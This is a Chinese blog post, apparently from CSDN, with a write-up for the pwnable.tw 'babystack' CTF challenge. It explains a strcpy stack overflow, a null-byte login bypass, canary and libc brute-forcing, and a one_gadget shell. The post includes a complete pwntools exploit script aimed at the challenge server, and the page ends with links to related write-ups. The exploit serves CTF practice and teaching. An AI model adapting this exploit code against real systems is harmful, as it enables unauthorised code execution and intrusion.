pwnabletw-babystack

最新推荐文章于 2024-09-05 13:49:08 发布
最新推荐文章于 2024-09-05 13:49:08 发布
阅读量1.7k 收藏
点赞数
分类专栏: pwnabletw 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41667316/article/details/122142957
版权

BabyStack

思路

  • 危险函数,strcpy。
  • 在copy的时候strcpy看似没有问题,但是由于src的内容并没有清空,还保存着被销毁栈的原有数据,而strcpy是根据"\x00"来判定的,所以造成了栈溢出。
  • login的限制可以用"\x00"绕过。
  • 首先通过login函数中的strcmp,把canary值爆破出来。
  • 然后利用copy函数栈上的垃圾数据中保存的一些libc的相关地址,将其拷贝到canary的地址,然后继续爆破,就可以得到libc的基址。
  • 给了libc,一发one_gadget。

exp

这里卡了很久的一个地方是python3的p64返回的是bytes类型,而且bytes(s,encoding=“utf8”)和ascii都不对,手动改。
remote跑一次需要20多分钟。

from pwn import * 
from time import sleep
import os
import sys

elfPath = './babystack'
libcPath = '../libc_64.so.6'
remoteAddr = 'chall.pwnable.tw'
remotePort = '10205'

context.log_level = 'debug'
context.binary = elfPath
context.terminal = ['tmux', 'splitw', '-h']

elf = context.binary
if sys.argv[1] == 'l':
    sh = process(elfPath)
    libc = elf.libc
else:
    if sys.argv[1] == 'd':
       sh = process(elfPath, env = {'LD_PRELOAD': libcPath})
    else:
       sh = remote(remoteAddr,remotePort)
       context.log_level = 'info'
    if libcPath:
       libc = ELF(libcPath)

def blast(sz,al = ""):
    rcd = al
    move = 0
    for round in range(0,sz):
        tag = False
        for i in range(0,0x100):
            if i == 0:
                continue
            test = rcd + chr(i)
            sh.sendlineafter(">>","1")
            sh.sendafter(":", test + "\n")
            ret = sh.recv(1)
            if ret == b'L':
                tag = True
                rcd = test
                sh.sendlineafter(">>","1")
                break   
        if tag is False:
            rcd += chr(0)

    return rcd

if __name__ == '__main__':
    canary = blast(0x10)
    c = b""
    for i in canary:
        print(ord(i))
        c += bytes([ord(i)])
    print(str(c))
    sh.sendlineafter(">>", '1')
    sh.sendafter(":", "\x00" + "a" * 0x47)
    sh.sendlineafter(">>", "3")
    sh.sendafter(":","A") # put IO_file_.addr at random_array's addr
    # leak libc addr
    sh.sendlineafter(">>","1")
    IO_file_9 = u64(blast(6,"a" * 0x8)[8:15] + "\x00\x00")
    IO_file_addr = IO_file_9 - 9
    libc_base = IO_file_addr - libc.symbols["_IO_file_setbuf"]
    success("libc_base:" + hex(libc_base))
    one_gadget = [0x45216, 0x4526a, 0xef6c4, 0xf0567]
    shell_addr = libc_base + one_gadget[0]
    
    sh.sendlineafter(">>", '1')
    payload =  b"\x00" + b"A"*0x3f + c + b"A" * 0x18 + p64(shell_addr)
    sh.sendlineafter(":",payload)
    sh.sendlineafter(">>","3")
    sh.sendafter(":","A")
    sh.sendlineafter(">>","2")

    # sh.sendline("cat /home/babystack/flag")
    sh.interactive()
skyandcloud-pal
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
从0ctf2018 babystack学习return to dl-resolve
极目楚天舒的博客
05-06 1846
0x01程序分析首先查看main函数,比较简单,调用了alarm和sub_80483B,进入sub_80483B看看。sub_80483B的作用是读取0x40个字节到ebp-40处,这里显然存在栈溢出漏洞。发现只开了一个栈不可执行,于是想构造rop链。但是整个文件搜索下来也没有发现什么有价值的gadget。0x02  return to dl-resolve知识学习玩过pwn的赛棍都知道,pwn题...
pwnable tw BabyStack writeup
charlie_heng的专栏
03-02 1567
这题做得好难受….. 首先漏洞很明显是strcpy那里,可以strcpy超过0x3f个字符串 然后login,以\x00开头的话,就可以过login了 一开始我是想先泄漏程序的其中一个地址,然后利用stackOverflow 来rop一波的,然后发现,strcpy只能复制到\x00前,所以只能用one_gadget 来一发get shell 但是这里还有canary要过,这里很明显就是利用...
Babystack
pppp974的博客
08-19 490
#!/usr/bin/env python from pwn import * elf=ELF('./babystack') libc=ELF('./libc-2.23.so') p=remote('111.198.29.45',30865) prdi_addr=0x400a93 main_addr=0x400908 one_gadget=0x45216//找到库中('bin/sh')的相对地址 ...
BUUCTF-pwn(8)
njh18790816639的博客
12-29 550
pwnable.tw 9 seethefile [250 pts]
qq_42192672的博客
12-04 796
之前做了五道题直接做自闭了,各种手写shellcode,学到了很多姿势,这是一道文件题,没接触过,来挑战一下…… no canary found!!!!!! 拖进IDA分析 一共有五个功能 有一个明显的栈溢出 我们可以通过溢出name来覆盖fp 1)openfile:打开文件,文件指针就是fp,不能打开文件名为flag的文件 2)readfile:从fp读取0x18F个字节...
pwnable.tw writeup
钞sir的博客
02-27 4082
start 这道题是静态编译的,或者可以理解是就是直接用汇编写的,所以这个程序很小,没有可以利用的函数; sir@sir-PC:~/desktop$ objdump -R start start: 文件格式 elf32-i386 objdump: start:不是动态对象 objdump: start: 无效的操作 反汇编代码: sir@sir-PC:~/desktop$ objdu...
pwnable.tw - orw
不急不躁
07-09 3034
简单概览 与 start 不同,该程序使用动态链接 提示仅允许有限的系统调用 open read write 函数 程序运行 哪怕是输入一个字母,程序仍然会出现段错误 检查安全措施 可见栈上开了 CANARY 程序 在 IDA 中反编译可见: 函数 orw_seccomp 反编译: 程序从终端读入内容,存放在 shellcode,然后执行该命令 ...
pwnable.tw记录之applestore
qq_35429581的博客
10-31 1438
耐下心用ida分析: 主要功能函数handler: create函数malloc一块16字节的内存,分别存放:char* name,int price,struct * bk ,struct * fd   ,由insert()函数将当前商品的结构体插入链表尾部。链表的起始位置记录在全局变量 myCart(0x0804B068)中。 delete函数进行链表的拆卸: 一开始觉
XCTF PWN高手进阶区之babystack
neuisf的博客
01-30 479
此题,开启了RELRO、NX、CANARY,未开启PIE,只有read函数溢出存在溢出可能。 第一,泄露canary,程序会通过puts函数输出缓冲区s的内容。puts函数在输出时,只有遇到\0才会结束,而缓冲区s又和main函数的canary相连,此时,输入和缓冲区大小相等的字符串,溢出的\n将会覆盖canary的第一字节00,从而将canary的后三个字节输出,构建canary。 第二,获取s...
pwnable.tw---orw
杀生丸?不,其实我要的是桔梗
05-01 1555
pwnable.tw—orw 这题主要考验的是shellcode的自我制作,建议学会Linux Sysycall Reference 再来,或者第一题start彻底搞会。 题目分析: 照例: 就开了栈保护,虽然都没有什么用。 题目开始就是让你输入shellcode。 就用msf随便试了几下,发现有些被过滤了。 调试看看: 发现调用了seccomp,百度了下是一个linu...
leetcode Subsets
charlie_heng的专栏
09-08 154
这道题是求一个集合的所有子集 可以递归解 代码如下 class Solution { public: vector<vector<int>> subsets(vector<int>& nums) { if(nums.size()>0) { int t=nums[0]; ...
算法入门网站介绍——USACO
charlie_heng的专栏
10-04 1559
算法入门网站介绍——USACO学号: 16340113 本人学院算法入门网站介绍USACO 注册 做题规范 好处usaco是美国中学生的官方竞赛网站,美国著名在线题库,专门为信息学竞赛选手准备,但必须在注册后才能进入题库1,虽然说是面对美国中学生的网站,但是里面的题目对于新手来说可是一点也不简单注册 首先我们进入usaco 在登录栏上面有Register here for a username/
pwnable tw Starbound writeup
charlie_heng的专栏
03-02 931
这题漏洞很明显,选择菜单的时候可以输入负数,然后可以在name那里填入想调用的函数,这样就可以实现任意地址执行 但是有了这个之后怎么用呢?? 这个就有点难度了,本来是想看一下栈,看看有没有可以用的参数,但是发现基本都用不了……. 然后想了下,这题没有给libc,又没有system,那么多半是ret2dl_resolve 那么ret2dl_resolve又需要rop,那么这题应该就是rop了...
writeup-FLAG 实验吧
charlie_heng的专栏
11-30 1620
题目如下 请输入 FLAG,下面的页面会告诉你 FLAG 是否正确 解题链接: http://ctf5.shiyanbar.com/qwctf/flag-checker.html 看了下打开的页面,发现一大串js代码。。。分析了一下发现a[0]给出了,然后可以一个个地推下去于是把js代码保存在一个文本下面,写了个py代码来解import recontent =open("C:/Users/Adm
九盾叉车U型区域警示灯,高效照明和安全警示
jiuxindianzi的博客
09-05 364
九盾叉车U型区域警示灯,LED光源,U型光线设计,覆盖广,亮度高,适应多车型,防护等级高,使用寿命长,有效防止叉车碰撞事故,提升作业安全性。
智能对决:提示词攻防中的AI安全博弈
最新发布
weixin_41496173的博客
09-05 769
在2024年上海AIGC开发者大会上,知名提示词爱好者工程师云中嘉树发表了关于**AI提示词攻防与安全博弈**的精彩演讲。他深入探讨了当前AI产品的安全现状,提示词攻击的常见手段及其应对策略。本文将对他的演讲进行详细的解读与分析,并结合实际案例和技术手段,探讨如何在AI应用开发中提高安全性。
海外直播对网速、带宽、安全的要求
TIANGEKUAJING的博客
09-03 477
要满足海外直播的要求,需要拥有合适的网络配置。在全球化的浪潮下,海外直播正逐渐成为企业、个人和各类组织的重要工具。不论是用于市场推广、品牌宣传,还是与观众互动,海外直播都为参与者带来了丰富的机会。然而,确保高质量的直播效果,必须满足特定的网络条件。
【看雪-注册安全分析报告】
09-05 1428
看雪学苑(www.kanxue.com)是一个专注于PC、移动、智能设备安全研究及逆向工程的安全综合服务网站!创建于2000年,历经20多年的发展,看雪网站形成了大量有价值的技术资料,经过看雪团队的共同努力,先后出版过数本技术专著,深受出版社和广大读者好评,社会影响深远,在行业中树立了令人尊敬的专业形象。平台为会员提供安全知识的在线课程教学,同时为企业提供智能设备安全相关产品和服务。
注册安全分析报告:央视网
Explinks的博客
09-03 831
央视网作为中央广播电视总台主办的中央重点新闻网站和国家级互联网视频综合传播服务平台, 采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“业务量很小啦,系统就这么点人用,不怕的” , “我们怎么会被盯上呢,不可能的”等等。有一些理由虽然有道理,但是该来的总是会来的。前期欠下来的债,总是要还的。
高端控制台使用过程中如何保证用电安全
JiaDeLi_console的博客
09-03 637
因此,在使用过程中,采取有效措施确保用电安全,不仅关乎设备寿命,更直接关系到人身安全及数据安全。同时,增强员工的安全意识,让每个人都成为用电安全的守护者,共同营造一个安全、稳定的工作环境。在高端控制台的使用过程中,可以引入智能监控系统,实时监测电力参数、环境温度等关键指标,一旦发现异常立即报警,为及时处理问题提供有力支持。总之,高端控制台使用过程中的用电安全是一项系统工程,需要从电源布局、设备选型、日常维护、人员培训以及智能监控等多个方面入手,全方位、多角度地确保用电安全,为设备的稳定运行保驾护航。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值